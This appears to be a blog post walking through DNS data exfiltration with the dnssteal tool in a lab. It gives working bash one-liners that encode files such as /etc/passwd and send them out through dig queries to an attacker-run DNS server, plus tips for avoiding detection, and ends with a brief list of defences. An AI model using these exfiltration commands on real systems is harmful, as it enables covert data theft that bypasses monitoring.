This has been a thought of mine recently. Sitting on any network, if its a work network or on your home network - I often think about how to exfiltrate data without getting flagged by any security tools. Obviously I don't action these, but I think its good to have these thoughts in mind so we can better protect our assets and data from going into the wild. In my opinion, I believe its difficult these days as there are many security layers that often detect even the smallest footprint on a network. Every organisation deals with handling data differently, which makes data exfiltration attacks very real. I often explain to the new guys about how to think of a Security layout from an Enterprise point of view. The Perimter into the company itself; think of it like a train line into the City. The city is your company, and has many stop until the end of the train line. These stops/stations are your security tools. For an attacker to get from the end of the train line to the city, you must stop at many stations in between.

Example Attack 1

I think a lot of companies out there do not often have “eys on glass” monitoring of DNS egress traffic, with that, I believe this is the perfect escape route for data exfiltration on any network for a hacker. DNS is not often filtered on the firewall as there are thousands of DNS queries a day. Every web request is a DNS query, and would be cumbersome to montior this traffic closely all the time.

I’ve decided to give dnssteal a go. One good thing about this is that you don’t need an authorative DNS server set up. This will avoid the costs that you have to pay in getting this up and running; instead, dnssteal sets up a fake one for you on your C2/call back server. I decided to test this on my lab machine to see what kind of things I could do with it. Basically this is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

For example I am in an assumed breach scenario whereby I have access to the machine already on the network. I would git clone this on the victim machine or even just write it on disk so that git clone doesn’t trigger any alerts that could be seen from enterprise defenses.

python -z

With the above command, it is setting up a Fake DNS server on my attacking machine waiting for DNS requests nearby. Think of it like a netcat listener. The -z option unzips files automatically for me.

Moving over to my attacking machine; I want to exfiltrate the secrets.txt file over to my Kali machine through DNS. I add the below command which encrypts the data and sends it to my listener on my attacking Machine.

f=secret.txt; s=4;b=57;c=0; for r in $(for i in $(gzip -c $f| base64 -w0 | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s" ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @ `echo -ne $r$f|tr "+" "*"` +noidnout +noidnin; done

Moving back to my attacking machine, I can see that there has been a connection on my DNS listener.

Lets peek in the file to see if this is correct.

There you have it, I have successfully exfiltrated data through DNS. Lets check the contents of tcpdump to review if our attack actually went through port 53. Before I completed this attack, I had the command below running to capture all the packets on my network interface, only probing for port 53. as we can see from the below picture all traffic traversed through DNS, thus, this data exfiltration exercise has been a success.

Example Attack 2

This tool is much more advanced than this. Say for example the attacker wants to be more stealthy, and this method is too noisy. This tool allows attackers to chop down the files in bytes sizes, so that when pushing data outbound through DNS; it will go through small chunks in sizes; in turn will be harder to detect through normal security tools.

python -z -s 4 -b 57 -f 17

The parameter -s is for defining the subdomain value, -bs for specifying the number of bytes per packet and -f is for defining the value of bytes for the filename. In the above command, which can be well observed from the image given below as well, we have defined 4 subdomains. The bytes per packet are set to 57 and file name value is 17.

This one would send 57 bytes per subdomain, of which there are 4 in the query. 17 bytes reserved for filename at the end.

Lets go over our Victim machine and start exfiltrating data. This time, I’m going to see if I can obtain the /etc/passwd file in chunks.

f=passwd; s=4;b=57;c=0; for r in $(for i in $(gzip -c $f| base64 -w0 | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s" ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @ `echo -ne $r$f|tr "+" "*"` +short +noidnin +noidnout; done

Going back to our attacking machine, we are able to see some output. Great, there files that has been received through the our fake DNS tunnel.

Observing our tcpdump output, we are able to see the files going through DNS port 53 which is a success, once again.

How can we block this?

  • Implementation of Network Intrusion Prevention System. This implementation should be based on a network signature and anomaly of packets.
  • Network traffic should be filtered by limiting the clients to converse with DNS.
  • Dedicated DNS servers should be set up.
  • Proper network segmentation should be done.
  • Network traffic flow should be on the bases of firewall rules.
  • Data Loss Prevention Policies should be adapted.
  • Network logs should be maintained and monitored.

Until then hackers, over and out!